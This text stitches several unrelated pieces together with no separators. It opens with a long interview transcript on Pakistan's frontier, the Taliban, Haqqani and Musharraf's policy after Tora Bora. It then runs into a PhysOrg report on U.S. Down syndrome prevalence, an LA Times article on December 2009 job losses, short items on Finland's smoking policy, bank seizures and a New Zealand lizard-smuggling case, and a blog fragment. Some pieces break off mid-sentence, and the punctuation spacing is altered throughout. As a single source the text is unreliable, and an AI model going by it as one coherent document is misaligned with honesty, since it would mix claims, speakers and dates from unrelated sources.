The Pakistanis have on the border a light force , a constabulary really , that is drawn from local tribes .
This Frontier Corps , as it's called , was never a very reliable blocking force , and in the context of radicalization and division within Pakistan about the war against the Taliban , it was even less reliable .
If the Pakistan - Afghan frontier was going to be blocked in any effective way , [ a ] difficult job under any circumstances , it was going to require the Pakistan army , the regular army .
But in December , just as Tora Bora was raging , the Pakistan army was focused on India to its east , because a terrorist attack in New Delhi had caused India to mobilize its entire military to the Pakistan frontier .
Pakistan began to pull divisions off the Afghan frontier to face India in a war that it thought might well be coming at the first of the year .
...
The Americans understood that December that Pakistan had reason to believe that it faced an existential war against India and that it required these divisions .
It was difficult to argue with them , but the fact was -- and it was n't announced at the time -- that the blocking force , such as it was , that Pakistan had promised , was being redeployed to face India .
...
And so our chance to nab [ Osama ] bin Laden and [ Ayman al - ] Zawahiri was lost .
It was lost because the blocking force that was up there to begin with was weak , and that force was weakened further by the withdrawals of regular army to the east to face India .
Now , I had some conversations with some of the heads of the Awami National Party , the Pashtun nationalists , who said that the ISI basically whispered in the ear of some of the top Al Qaeda lieutenants and said : " Look , do n't come across .
There 's a blocking force there .
Do n't come across there .
Go into South Waziristan . "
It 's an enormously long border , and there are many different ways to come across it .
It would have been very easy to communicate with Al Qaeda leaders through Islamist tribal groups along the frontier , through ISI , through some combination of the religious parties , to communicate alternative routes , both to the south through Waziristan and also to the north .
The intensity of the Pakistani force 's ability to block escape routes was very narrowly concentrated .
And then weakened because of the crisis in the east .
Yes .
In your view , is it feasible to believe these stories that they were tipped off and told where to go ?
It 's quite feasible , because , look , it 's not a conspiracy involving a handful of people , as has been amply demonstrated by bin Laden and Zawahiri 's ability to remain at large in the ensuing six years .
This is a population that regards them with sympathy and active support .
And it 's not just a few people -- it is the tribal leadership ; it is the tribal population ; it is the religious parties .
They are in friendly territory .
That 's not to say that everyone along the frontier sympathizes with the violence that they inflicted in the United States or believes that their presence is good for the local population .
But they enjoy broad sympathy , and they also enjoy infrastructure that includes communication and facilities .
We see this today ; it was certainly true in those hours of crisis in the fall of 2001 .
...
Who was Nek Mohammed ?
Nek Mohammed was a Taliban and Pashtun Islamist commander who had been very active along the southern frontier in the 1990s .
He was regarded , I think , as a bit of a hothead and a little bit of a dangerous figure , which is a useful reputation to have as a commander .
He did n't have a long history with bin Laden and Zawahiri , but he controlled the ground that they needed , and he was sympathetic to their cause .
He also seemed to have the view that anyone who the United States and Pakistan army regarded as an enemy had to be a friend of his .
On the other hand , Jalaluddin Haqqani has very long and intimate roots , and a long history with bin Laden personally .
When Al Qaeda was formed along the Afghan - Pakistan border in the summer of 1988 , its first camps were in Haqqani 's territory .
The first infrastructure of Al Qaeda was essentially supervised by Haqqani .
Haqqani himself raised money repeatedly in Saudi Arabia and had rich contacts with Arab fighters coming to the region .
He was their Afghan patron in many ways .
He was an extraordinarily effective fighter , and he also had the benefit of favored support from ISI and the CIA , for that matter , right through the end of the anti-Communist war in Afghanistan .
So bin Laden and Haqqani would have known each other for 15 years by the time bin Laden came across the border after Tora Bora .
So he 's running into the arms of a friend ?
A brother .
And Haqqani is based in Miram Shah , in North Waziristan ?
In that area .
He 's always been based right around Miram Shah .
Is he Pakistani or an Afghan ?
He 's an Afghan who has some credibility in terms of social identity in the Miram Shah area , but mostly he 's earned his reputation by being an extraordinarily effective , brave and tenacious war fighter .
He fought the Communists in that area around Miram Shah ... very effectively .
He was under fire himself , wounded , treated in hospitals in the Persian Gulf , back into the fray .
I think for many of the Saudis and other Gulf Arabs who would encounter him at hajj , where he would raise money in tents in Mecca , he was the symbol of Afghan bravery and independence in the face of the Soviet occupation .
He came to understand through his own acquisition of Arabic language and his frequent visits to Saudi Arabia that his reputation was something that could lead him to resources that many of his rival commanders could not possess .
The CIA and the ISI in the late ' 80s also saw Haqqani as an unusually effective commander against Soviet forces .
He was willing to fight .
He did n't go to a lot of meetings ; he might be rough around the edges , but Americans would go up to Miram Shah and sit cross - legged at meetings with him as the cash and the weapons were being directed his way .
They came away with an impression similar to the pilgrims at the hajj :
This was an Afghan war fighter .
This was an independent - minded , dangerous man , but someone we could do business with .
Haqqani received a great deal of support .
At the same time , he controlled this area around the south of the Khyber Pass … that was an obvious crossing point for volunteers like bin Laden , who were based in Peshawar .
Most of the Arabs who came to the war in the late ' 80s came through Peshawar , and Miram Shah was a particularly easy place to come and go from , especially if you were n't sure how much time you wanted to spend in Afghanistan .
And not far from the border , and a good road over the mountain .
A good road over the mountain .
And here 's a local commander , Haqqani , who everybody on the enemy side is scared of , who 's well known to Saudis , who speaks a little Arabic , and who credibly controls this ground .
It 's not a coincidence that the first camps that bin Laden created in Afghanistan , Lion 's Den and some related infrastructure that he started to build , were in Haqqani 's territory .
I want to shift back to South Waziristan ; we 'll come back to the north .
Starting in 2002 and 2003 , the army is into South Waziristan and is fighting some battles .
...
Are we to believe that the Pakistan military was , in fact , down there to root out the Taliban ?
The Pakistan army had a complicated agenda when it invaded South Waziristan .
It 's their first foray .
It 's their first foray ; it 's the first time any Pakistani army has gone up in this territory for the purpose of trying to change the political equation .
It 's hard to know exactly what Musharraf had in mind , but I think there 's reason to believe that he hoped , perhaps fantasized , that he could change the political equation in Waziristan and ultimately in all of the tribal territories by military action .
This might also have benefits for his alliance with the United States , because he would be pursuing an American agenda at the same time he was pursuing his own agenda .
And he 's getting money for it .
And he 's getting money for it .
But rather quickly he discovered that there was no military solution in South Waziristan , or there certainly was n't a quick one .
When the army started to take these hits after it got up there , he hunkered down and stopped the operations fairly quickly .
That suggests that he never really had a vision of a long - term , hard - fought invasion and occupation .
I think he was hoping that a short , sharp demonstration of military will would cause tribal leaders and political leaders to switch sides and accommodate the Pakistani agenda up there .
Of course that has never happened in the history of this territory .
And then , in fact surprisingly to an outsider , believing that Musharraf is an ally , he begins negotiations with the Taliban .
And with all of the Taliban sympathizers in Waziristan .
Including Al Qaeda .
Including Al Qaeda .
You know , the Pakistan army is playing a very weak hand up in this territory .
Some Americans who worked with the Pakistanis after 9/11 have told me that after all these years of being locked out by ISI , wondering about the exact texture of ISI 's relationship with their Taliban clients , there was , initially in the fall of 2001 among the Americans , a feeling : " Oh , well , now finally we 're going to get to see their client list .
Finally we 're going to get to have the benefit of their infrastructure up there along the frontier .
We 're going to be able to really get down into the villages and hunt for these guys . "
But what turned out -- at least what ISI shared -- was that they were n't very well distributed ; they were n't very broadly distributed .
They had a relatively narrow base of relationships , and a lot of it was in Karachi and in Quetta and on the Pakistan side of the border .
In the cities .
In the cities .
So they did n't really have a network .
They had some top - heavy client relationships which they struggled sometimes to manage effectively on their own behalf .
Anyway , when the Pakistan army went up to South Waziristan and got whacked pretty quickly , they started to negotiate , in part because they did n't have another card to play .
They 're very weak .
They 're very weak .
So they 're negotiating ; they 're offering money to Taliban commanders .
What do they hope to get for this , and what happened ?
The basic idea of Pakistani strategy was to renew the approach to managing the frontier that dated back to the British period , which was essentially to operate through cooption , bribery and the construction of infrastructure , to find political intermediaries in villages and towns on the frontier who would be willing to work with the Pakistan army in order to reap the benefits of the Pakistan army 's patronage .
That 's the way the frontier has been managed , to the extent it 's been managed , for a long time .
But they were n't negotiating with tribal elders ; they were negotiating with the Wana Five , led by Nek Mohammed , a young , 27 - year - old Taliban commander .
What the Pakistanis discovered when they hunkered down in South Waziristan is that the old political intermediaries in Waziristan and elsewhere in the tribal areas had been essentially overtaken by religious commanders and religious networks .
Someone like Nek Mohammed represents the new authority in Waziristan .
Pakistanis attempted to negotiate with him the way they used to try to negotiate with the old authority , but it turns out that the Islamists are not as interested in the patronage of the Pakistani state as traditional tribal elders had occasionally been .
...
My understanding is that when the negotiations failed , it was an embarrassment , obviously , for Musharraf with the Americans .
He had taken some heat already with the Americans when he stopped his military operations after the early casualties that he faced .
What happened ?
I think the Americans were disappointed that the Pakistan army had hunkered down so quickly .
They understood that these casualties were political [ly ] poisonous in Pakistan ; that Musharraf was waging an unpopular war with his own population ; that he was incurring risks by undertaking this military invasion .
Nonetheless , he was in for a dime .
The feeling , I think , on the American side was , well , let 's go at least up to 50 cents before we quit .
Instead , Musharraf began to promote this view that he has continued to promote some of the time , which is that you do n't understand how political change is effected in this part of the world ; I 'm going to negotiate and coopt our rivals .
Well , Nek Mohammed and those negotiations were a rather stark failure of that strategy and that argument .
So Musharraf , who is a very proud man , I think felt embarrassed by Mohammed .
Look , Nek Mohammed was not a very savvy political figure .
He was a kid in a candy shop .
He had suddenly been celebrated by his enemies , though he had n't really offered any concessions at all , and he was himself so reckless that he made himself vulnerable politically and militarily .
His assassination was one of the rare times when Musharraf and his commanders were able to target a specific individual and bring him to an end .
Or at least allow the Americans to fire a Hellfire missile from a Predator drone .
Yeah .
Perhaps it 's indicative of the deep divisions within the military that you can't go into these areas and push very hard before you have a rebellion on your hands .
After all , are n't many of these military officers from families with brothers who are in the Taliban ?
...
There are family networks that run from the Taliban into the Pakistan army ; from the Taliban into the civil service ; into the political parties .
This is a national struggle that 's been going on for 20 or 30 years , and it 's enormously complex .
It makes Musharraf 's position as a non-Pashtun all the more complicated , because he does not have the credibility of social or political identity that would be necessary to take an especially hard line up in the tribal areas .
He is to the tribal leaders , whether they 're Islamists or not , he is an outsider , and not a particularly credible outsider in their view .
I was surprised when I talked to Musharraf .
He agreed that he had lost South Waziristan , was losing North Waziristan .
...
Yeah .
Musharraf 's own attitude toward the frontier , I think , changed somewhat after the assassination attempt against him .
When he discovered that those attempts had been hatched , it seemed , or there was evidence that they 'd been hatched in the frontier , that made it personal for him .
Also , I think he 's realistic .
He understands that he's now so committed to this policy that half - measures are not going to get him anywhere but deeper into trouble .
The difficulty that he faces is that he does n't have a strategy in the frontier that looks plausible .
...
His attempts to control Waziristan are undermined by the fact that he 's fighting another war in a national province of Pakistan , Baluchistan , one that contains [ extraordinarily ] important natural resources and transportation corridors .
He cannot afford to lose in Baluchistan .
He belongs to a generation of officers that remembers the Pashtun nationalist wars in Baluchistan and along the frontier from the 1970s .
They regard this region as fertile ground for Indian mischief - making and for outside interference with Pakistan 's national integrity .
But if you ask any Pakistani general what 's more important , Baluchistan or the frontier , I think they would answer Baluchistan every time .
So he 's simply trying to hold the country together that is threatening to spin apart ?
And he would like a little more understanding from his allies in the United States about the complexity and variety of challenges to Pakistan 's unity that he is trying to manage , and also about the limits of military force in the frontier -- certainly Pakistani military force -- to change the equation .
Limits of Pakistani force and limits on their loyalty to his policy .
Not only does he have to worry about the integrity of the nation and , for instance , Baluchistan 's integration into the Pakistan economy , but he has to worry about the loyalty of his own military and his own officers .
Musharraf has established unity at the top of the Pakistan army , but he knows that that unity depends on continued support for policies that are at odds with the views of the great majority of Pakistanis .
In other words , Musharraf has made an alliance with the United States that has benefited the army .
He has convinced many of the officers around him that the policies he is following are good for the army , and by being good for the army , ultimately will be good for Pakistan .
But it 's a tenuous consensus .
And the rank and file are not with them .
And the rank and file are not with them .
And at least divided .
Certainly divided .
So is Musharraf a false ally ?
...
He 's not a false ally ; he 's a weak ally .
And he 's weak because he has made commitments that he can't deliver on through the institutions that he commands .
Let 's flip it around now and talk about what the Taliban has been able to do to exploit this situation and how that has led to the situation we 're now facing in Afghanistan .
The Taliban have a strategy that is very familiar to radical Islamists along the Afghan frontier : patience , political organizing , organizing of insurgency , collection of resources and the mounting of seasonal campaigns that consolidate territory and political support one year to the next .
How important is Pakistan to the Taliban ?
The Taliban are utterly dependent upon Pakistan .
They 're dependent upon its territory ; they 're dependent upon its infrastructure ; and they 're dependent upon the links to the outside world , however pressured , that they enjoy through Pakistani territory .
How does the United States develop a policy that can work without attacking the problem in Pakistan ?
No policy can succeed in stabilizing Afghanistan without success in Pakistan .
The question is , what approach to Pakistan is most likely to produce that success in the medium run ?
In the long run ?
There are some American military officers who argue that the United States is being too passive in its relationship with Musharraf ; that if we mean what we say about no sanctuaries for Al Qaeda , that we ought to deploy American forces along the frontier on Pakistani ground ; that American forces ought to go into Waziristan ; the American forces ought to go into Bajaur more openly .
If the Pakistanis can't do it , these officers argue , then the United States should .
So why do n't we ?
It may come .
But the deployment of an American military on the ground in the tribal areas would be an enormously costly event .
Certainly the United States would pay a price in casualties , but perhaps more significantly , Musharraf 's credibility as the president of Pakistan would be undermined .
The insurgencies that he faces in Baluchistan and along the frontiers would be inflamed , and the very tenuous political alliances that he has built to try to hold Pakistan together would be threatened .
Now , there 's enormous amounts of risk involved .
There are also risks involved in doing nothing .
One observation that 's easy to make is that before you took the risks and paid the prices that would be required in an American incursion into the tribal areas , you would wish to be convinced that your management of the alliance with Musharraf was producing the best possible result short of the deployment of American troops .
I think the evidence is that the American management of this relationship is not producing the best possible result .
Why ?
It is far too accommodating of Musharraf 's position .
It has not been successful in negotiating the balance of carrots and sticks that has been present in American - Pakistani relations for 30 years .
Look , Musharraf gets up every morning , and he thinks about how to manage his relationship with the United States .
It 's crucial to him .
It 's the source of weaponry that will help Pakistan retain its independence against India .
It 's the source of economic and structural support that undergirds Pakistan 's 6 percent economic growth rates .
It 's everything .
The United States does not get up every morning thinking about how to manage its relationship with Musharraf more successfully .
Somebody must .
Well , they have able diplomats on the ground and bureau departments in the military and the State Department .
But think about it : For the United States , Pakistan competes with Iraq -- an overwhelming foreign policy and military problem ; it competes with Iran 's nuclear program ; it competes with the war in Afghanistan itself ; it competes with a crisis in the Middle East .
Pakistan does not receive the kind of sustained , intense attention in American diplomacy , in American statecraft , that the United States receives from Pakistan .
But if the battle in Afghanistan cannot be won without addressing the sanctuaries in Pakistan , then what 's the point ?
Well , as the situation on the ground in Afghanistan deteriorates and as it becomes increasingly obvious to American commanders in Afghanistan that their struggles against the Taliban are rooted in these problems in Pakistan , a debate will rise inside the American system about new approaches to the problems in Pakistan .
The trouble is the problems are really difficult .
There is no obvious button to push .
And even as the situation in Afghanistan deteriorates , Pakistan is not anywhere near the first priority in American foreign policy .
Right .
But it goes well beyond finding or not finding bin Laden .
It goes to the fact that we went there to prevent there from being a failed state , and in the process we 're seeing the rise of yet another failed state in western Pakistan .
We are .
And moreover , Al Qaeda the organization , the Taliban the organization , the movement which had been shattered in December of 2001 , have used this territory , this ground in Pakistan to begin to reconstitute themselves .
And they 're demonstrating new strength , not just in the region -- most notably in Afghanistan , southern Afghanistan , but also globally .
From their base in the tribal areas ?
The evidence in the London bombing case is that two of the bombers traveled not necessarily to Afghanistan but to Pakistan , and they may have had contact with Al Qaeda leaders in the tribal areas .
That 's a repetition , if true , of the pattern of the 1990s , where volunteers , sometimes spontaneously generated in Europe or elsewhere abroad , would fly into Pakistan and connect with Al Qaeda leaders in order to acquire the resources , training , expertise , motivation they needed to carry out a task in their home countries .
So even if we are able , through force and luck , to solve the problems in Afghanistan , if we 've left the area with a failed state in western Pakistan , I guess the question is , what have we gained ?
Well , I find myself occasionally thinking about an e-mail that [ counterterrorism expert ]
Richard Clarke wrote to [ then - National Security Adviser ] Condi Rice just before the Sept. 11 attacks , in which , fearing that such an event was coming , he implored her : Imagine a day when hundreds of Americans lay dead in an Al Qaeda attack , and ask yourself , what would you do in the aftermath of such an attack , and then do it now .
You can ask the same question about the failed state that 's emerging in western Pakistan .
The next attack against the United States may well have roots in this failed state or emerging failed state .
What [ are ] the United States and its allies going to do about this problem then , and why is n't it being addressed now ?
Good question .
I mean , we 're limited right now .
We 've decided not to go in .
We fire missiles .
First of all , they do n't admit that they allow such missile strikes , and in the one instance in Bajaur where they did admit it , they faced demonstrations on the streets .
This has to be a warning about what would happen if U.S. troops were to cross the line .
...
If the United States and some of its Afghan allies crossed into the tribal areas to try to either identify and arrest or kill fugitives or pacify these tribal agencies , they would find it a very difficult mission indeed .
At a minimum , it would require a very large force .
And even after that force was established , it could expect regular suicide attacks and other sources of violent resistance that would create a very steady flow of casualties .
...
Ultimately the Pakistan army , the Pakistan government , whether it is led by Musharraf or someone else , is going to have to bring this territory into a modernizing , successful Pakistani state .
Otherwise , Pakistan itself cannot succeed .
They seem to do better fighting Al Qaeda than the Taliban .
Well , because when they 're fighting Al Qaeda , they 're fighting foreigners .
...
But when the Pakistan army is fighting the Taliban , they 're fighting cousins ; they 're fighting brethren .
They 're bound by language ; they 're bound in some cases by tribal identity ; and they 're also bound by a sense of just broader affiliation .
Pashtun identity , tribal identity -- [ what 's ] very complex and difficult for outsiders to fully map is , whenever encountered , a very powerful source of pride and personal identity .
That 's true for the Pakistani generals who are loyal to Musharraf , loyal to the state , but also very proud about their own roots in this territory .
...
What is the current situation in Afghanistan ?
The Taliban have had a very successful spring and summer .
They are demonstrating military and political strength that they have not been able to demonstrate since Sept. 11 .
They are organizing in the villages .
They are mobilizing attacks .
They are using sophisticated tactics that they were not demonstrating before .
The geography where the Taliban is showing strength is more worrisome than a year ago or three years ago .
The amount of it ?
The amount of it .
It now suggests that the Taliban are finding local support , not just in their heartland of Oruzgan and Kandahar , but also in Helmand , elsewhere in the south and along the eastern border with Pakistan .
Like Khost and Nuristan .
Khost , Paktia , Paktika .
There have always been pockets of Taliban support in these areas , but the breadth of the Taliban offensive this year is particularly striking .
Taliban still have problems .
They can't mass and assemble .
Their ability to successfully take and hold territory is questionable .
But they are beginning to demonstrate some of the characteristics of the militia that they once were ; that is , an ability to organize formal movements in the field , to take and hold at least small towns .
That is a bad sign about the political support that they 're enjoying , and also the perception that Afghans in the south seem to be developing about their strength , their resources , their political infrastructure and their inevitability .
There 's been a lot of finger - pointing at the Pakistanis for being responsible .
...
Is this finger - pointing legit ?
Is it justified ?
Or is this blaming the other for a failure of [ Afghan President Hamid ] Karzai and the Americans ?
Both the Afghan government and Pakistan government have done less than they might to stabilize the political situation in southern Afghanistan .
Karzai has not been as effective a leader in the south and east as he might have been .
And Musharraf has been nowhere near as effective as he might have been in depriving the Taliban of the political and physical space that they have enjoyed as sanctuary , particularly in the last two years .
As to the United States and Pakistan , the United States is beginning to recognize that its project in Afghanistan will fail unless it addresses the sanctuary and support that the Taliban enjoys in Pakistan .
But the United States has not yet reached the point where it knows what kind of a new policy it is prepared to carry out in Pakistan and what price for that policy it 's willing to pay .
...
Well , sitting here five years from 9/11 , are you surprised that we 're facing this challenge in Afghanistan the way it 's unfolding now ?
No , not really .
...
I think that convincing Pashtuns in southern and eastern Afghanistan that they want to participate in a new national democracy always looked like a 20 - or 30 - year project .
The problem that I would n't have fully predicted is the failure on the Pakistan side of the border to deny a resurgent Taliban the space they need to organize .
And a resurgent Al Qaeda .
And the resurgent Al Qaeda .
But even from Afghanistan 's point of view , the Taliban are obviously the far more dangerous problem .
And the fact that Quetta and the Baluch countryside and the tribal areas have essentially become denied spaces for the Pakistan army is shocking .
I 'm sure that Musharraf is aware that if he does not do something about the territory that he is losing in the southwest and along the frontier , that he is going to face a very severe problem five or 10 years down the road .
But I do n't think he knows what the solution is .
Is Musharraf going to be around five or 10 years down the road ?
He thinks he is , evidently .
Musharraf continues to believe that he is the indispensable man in Pakistan .
...
The problem with Musharraf 's whole strategy -- and it's not just true on the western frontier ; it 's true nationally -- is that he is trying to weaken parties that any sensible leader would recognize are his natural allies , or at least his natural instruments .
The more he weakens the Awami League , the more he weakens the PPP [ Pakistan Peoples Party ] , the more he deprives civilian , moderate Muslim Punjabi politicians of the space to build alliances in Baluchistan and to try to seek power in provincial governments , the more he makes it difficult for his own army to control this ground .
There is no military solution .
There is only a combination of military and political measures undertaken over a long period of time that will bring this ground under control for Pakistan .
I would add that he is not going to control his western frontier until he also settles his eastern frontier .
As long as he tempts India to make mischief in Baluchistan by making mischief himself in Kashmir , he deprives himself of the space in which he could achieve any kind of reasonable solution .
He knows this .
The Indians know it , too .
Every Indian soldier who dies in occupied Kashmir , there is somebody in New Delhi who is looking at a map of Baluchistan and looking for payback .
Musharraf understands this .
It 's why he feels that this area is an urgent matter of national security even beyond the American agenda .
But he can't get there without political allies , and yet he is unwilling to share power in the way that would produce that flowering of other political forces besides the Islamists along the frontier .
One of the most interesting points I heard when I was over there was from one of the leaders of the Awami National Party .
[ He ] said that " Look , we can't go into the tribal areas because of longstanding rulings that say we can't go in there and have any kind of political organizing take place . "
No political party can go in .
So the only person with political power in these areas is the mullah , who 's essentially a political figure .
That is the heart of the problem in these areas .
The mullahs have overtaken the politicians .
They have overtaken the tribal leaders .
Musharraf belongs to a generation of officers in the Pakistan army who remember the frontier as a problem because of its leftist Awami League , secular tribal leaders , some of whom were subsidized by the Soviet Union .
He has an , in my view , irrational fear of secular politics in some of these parties .
But he needs these parties even if they 're going to make his life more difficult in Islamabad .
He needs them to consolidate unity in Pakistan and to control the frontier .
He can't do it without them .
Is he going to allow political organizing in --
No , he shows no signs of having a political strategy that would advance these goals .
So the mullah stays in power ?
The mullah stays in power , and he continues to try to manage that equation as best he can by some combination of force , cooption and negotiation .
But he has been trying this approach since 2002 .
Here we are in 2006 .
It ai n't working .
Karyotype for trisomy Down syndrome .
Notice the three copies of chromosome 21 .
Courtesy : National Human Genome Research Institute
( PhysOrg.com ) --
A new study , aimed at estimating the prevalence of Down Syndrome in newborns , children and teenagers in 10 areas of the U.S. , has found an increase in prevalence of more than 30 percent over the last 24 years .
Down syndrome is a condition in which the person has an extra chromosome 21 , and is often associated with mental retardation and other problems such as heart abnormalities .
The major part of the study , by Dr Mikyong Shin and colleagues , was a cross-sectional analysis of live births from 1979 to 2003 .
The researchers analyzed data from 10 population - based registries of birth defects in 10 regions of the U.S. , along with data for children from 0 to 19 years old , and calculated the prevalence of Down Syndrome for newborns , children and teenagers in each of the areas and in the total pool .
The data were also analyzed for the prevalence of Down Syndrome in specific age groups , for each gender , for different ethnic and racial groups , and for association with heart defects .
The researchers found an increase in prevalence of Down Syndrome at birth over the period from 9.0 to 11.8 per 10,000 live births , which represents an increase of 31.1 % .
The pooled data of 0 - 19 - year - olds also indicated a higher prevalence in white non-Hispanic people than in black non-Hispanic people .
More males than females were affected in all groups .
The prevalence rose over time in each age group , but decreased with age within the birth cohorts .
The prevalence of Down Syndrome babies increased significantly with the age of the mother , with 7.8 per 10,000 born to mothers under 35 , and 38.6 per 10,000 for mothers 35 or older .
Maternal age has long been known to be a risk factor for Down Syndrome , and many researchers are trying to find out the specific reason for this .
Overall , the study found the prevalence of Down Syndrome at birth is increasing , and so are survival rates .
In 1983 the median age at death was 25 , while in 1997 it had climbed to 49 .
The findings of the study may have implications for the allocation of resources for Down Syndrome patients in the future because sufferers often have associated conditions such as vision problems and congenital heart defects , which means they can require a high degree of care .
The findings in the U.S. are not reflected in the U.K. , where a recent study found the prevalence remains steady .
This was attributed to terminations of pregnancies after screening and diagnosis .
Without the terminations , the prevalence would also have increased in the U.K. , since after a positive diagnosis around 92 percent of the pregnancies were terminated .
Data available for California suggests the equivalent figurer there is 60 percent .
The U.S. paper was published online in the Pediatrics journal on November 30 , and will appear in the December issue of the print edition .
More information : Prevalence of Down Syndrome Among Children and Adolescents in 10 Regions of the United States , PEDIATRICS Vol.
124 No. 6 December 2009 , pp. 1565-1571 ; doi:10.1542/peds.2009-0745
© 2009 PhysOrg.com
Explore further Advances in screening have offset an increase in Down syndrome
The government in Finland has become the first in the world to say it intends to phase out smoking completely .
Anti-tobacco laws are being tightened in what anti-smoking campaigners have called a war on the cigarette industry .
Paul Henley reports from Helsinki .
The U.S. economy ended the worst year of employment losses since the Great Depression with an unexpectedly large drop of 85,000 jobs in December -- dimming hopes of a quick upswing in hiring and intensifying Washington ’s partisan fight over how to create more opportunities for workers .
The unemployment rate for the month was unchanged from November at 10 % , the government said Friday , but that was only because droves of people , including many discouraged about the prospects of finding work , dropped out of the labor force and were no longer counted as unemployed .
“ The increased number of discouraged workers is masking the true extent of joblessness , ” said Anne Kim , economic program director at Third Way , a liberal policy think tank in Washington .
The latest report was all the more disappointing because the employment data for November raised hopes that the steep , two - year - long employment decline had hit bottom .
And revised figures released Friday by the Bureau of Labor Statistics showed the economy added a net 4,000 jobs in November instead of losing 11,000 as initially estimated .
Advertisement
But in December , large payroll cuts in construction and manufacturing , possibly inflated a bit by the weather , as well as smaller losses in other industries again took their toll on the employment picture .
And job increases in health and education services and the temporary - help industry were not large enough to offset the losses .
Many economists had projected that the December report would show essentially zero job growth , with some forecasting a small increase that would be the beginning of a robust recovery in hiring in the not - too - distant future .
Although administration officials cautioned that the overall unemployment numbers might get worse before the hoped - for turnaround , President Obama , speaking Friday at the White House , said overall job trends were still promising .
Advertisement
When he took office in the first quarter of last year , the nation lost an average of 691,000 jobs a month .
That fell to 69,000 jobs lost monthly in the fourth quarter .
The latest employment numbers “ are a reminder that the road to recovery is never straight and that we have to continue to work every single day to get our economy moving again , ” Obama said .
“ For most Americans , and for me , that means jobs . ”
Republican leaders pounced on Friday ’s report to attack the administration ’s deficit spending and economic policies , while liberal groups insisted that this was not the time to pull back from stimulus programs aimed at spurring job growth and helping the millions of unemployed Americans with safety net programs .
“ There ’s no way around saying it was something of a setback from what we had seen in November , ” said Christina Romer , chairwoman of the White House Council of Economic Advisors .
“ We now know that we added jobs in November .
I want to be adding hundreds of thousands of jobs a month . ”
Advertisement
The latest report was so bad that it cast doubt on an imminent positive turn in job growth , let alone a robust one , said Dean Baker , co-director of the Center for Economic and Policy Research in Washington .
“ It ’s totally plausible we ’re going to lose jobs for several more months in 2010 , ” Baker said .
If that happens , it would prolong the suffering of millions of workers and could pose a serious threat to the sustainability of the broader economic recovery , which has been gaining some momentum .
It also holds potentially dire political consequences for incumbents in Washington .
Advertisement
By the latest tally , the economy has shed about 7.3 million jobs since the recession began in December 2007 -- almost half of them since Obama ’s $ 787 - billion economic stimulus program was passed by Congress last February .
And next month the government ’s annual benchmark revisions of jobs data are likely to show that payrolls actually fell by about 8 million in the last two years .
Although much of Obama ’s stimulus package has yet to be spent , the persistent job losses and high unemployment -- expected to climb higher as more people reenter the labor force -- present formidable challenges for the administration and congressional Democrats as they face midterm elections in November .
A stark statistic in the latest report is the staggering number of people who dropped out of the labor force in December and in recent prior months .
Advertisement
In December , the number of people working or looking for work declined 661,000 from November and more than 1.5 million from December 2008 .
The last time there was an annual decline in the labor force was in 1951 .
Before the recession , the labor force had been growing at about 1 % a year , in tandem with the growth of the working - age population .
But the severe recession has prompted many discouraged people to give up looking for work .
The economy needs to create roughly 125,000 net jobs a month to keep pace with the growing population and workforce , and economists say it will take several years to make up for the roughly 8 million jobs lost since late 2007 .
In his brief prepared remarks at the White House , Obama singled out the importance of winning the global competition to develop renewable energy sources , which he and others believe will accelerate job growth .
The president announced that the government was using $ 2.3 billion in stimulus funds for tax credits aimed at manufacturing projects that will produce nonpolluting energy .
The money will go toward 83 projects in 43 states and will create “ tens of thousands of high - quality clean - energy jobs , ” according to the White House .
Advertisement
“ Harnessing new forms of energy will be one of the defining challenges of the 21st century , ” Obama said .
“ And unfortunately , right now the United States -- the nation that pioneered the use of clean energy -- is being outpaced by nations around the world . ”
The sour economy already has eaten into Obama ’s job approval ratings , and in the new year the president must show more personal compassion for people suffering under the economic downturn , Democratic pollster Peter Hart said .
He needs to “ get closer to the American people , ” Hart said .
“ He needs to feel the hurt and feel what ’s happening in the country . ”
This month Obama will visit Ohio , one of a series of stops in places hit hard by the recession .
Even so , that may all be seen as window dressing until the nation begins to add jobs .
Asked when that might happen , Romer said this spring would be a realistic target .
Advertisement
Business owners are n’t so sure .
“ It ’s going to be a long haul , ” said Kim Megonigal , chief executive of Kimco Staffing Services in Irvine .
Although the temporary - staffing industry is seen as a harbinger of broader hiring , Megonigal does n’t see substantial gains until next fall .
Despite recent signs of improvement in the housing and manufacturing industries , Friday ’s report showed that construction employers cut 53,000 jobs last month , and manufacturing added to the misery by eliminating 27,000 positions .
The two industries have borne the brunt of the job losses during the recession .
In the larger service - producing part of the economy , payroll declines have eased more significantly , but most sectors are still not adding net jobs .
Retailers overall cut 10,000 jobs last month , even as they reported stronger - than - expected holiday sales this week .
Leisure and hospitality businesses gave up 25,000 positions and government payrolls shrank by 21,000 .
Advertisement
The two major industries that added jobs were health and education , which expanded by 35,000 , and professional and business services , where employment rose by 50,000 , boosted by the addition of 47,000 temporary - help jobs .
don.lee@latimes.com
peter.nicholas@latimes.com
Regulators seized five banks in Florida , Missouri , New Mexico , Oregon and Washington , lifting the total number of failures this year to nine as financial institutions struggle with loan defaults and a weak economy .
Two of the five institutions had assets of more than $ 1 billion .
The Florida bank , in Miami , was sold to an investment group that includes former North Fork Bancorp Chief Financial Officer Dan Healy .
The deposits and assets of the New Mexico bank went to Texas billionaire Andrew Beal .
The ...
Geckos and skinks are protected species in New Zealand
A German man who tried to smuggle 44 live geckos and skinks out of New Zealand in his underwear has been sentenced to 12 weeks in jail .
The Christchurch court heard Hans Kurt Kubus , 58 , had sewn pouches into his clothing to hide the protected animals as he had gone through the airport .
Officials said the lizards could have sold for up to $ 2,000 ( £ 1,239 ) each .
Kubus had pleaded guilty to capturing the animals , but said they were for his own collection and not for sale .
District court judge Colin Doherty told him he had knowingly " plundered part of the wildlife " of New Zealand .
" I do n't think you necessarily came here to steal to sell , but I am sure the fact that you might have had excess was figured into your thinking , " the Associated Press quoted Mr Doherty as saying .
Kubus had eight separate pockets sewn into his underwear , separating the different species he had collected , with room for 24 geckos and 20 skinks .
Department of Conservation prosecutor Mike Bodie said it was " the most serious case of its kind detected in New Zealand for a decade or more " .
" It 's similar to stealing our family silver , " he told the Press newspaper .
Kubus was also fined NZ $ 5,000 ( $ 3,500 ; £ 2,190 ) and will be deported to Germany on his release .
Fall has arrived , along with its clouds to capture an amazing play of light in the late afternoon , in between rain showers .
The maples have started to turn that sweet read in earnest .
Salmon are attempting the annual jump up the dam in Leland , to the chorus of “ ooh ! ” from onlookers .
Today , the Joy ’s crew pulled the last two nets …
Read more »
Share this : Twitter
Facebook
This is one of our editors ' picks from our ongoing roundup of Investigations Elsewhere .
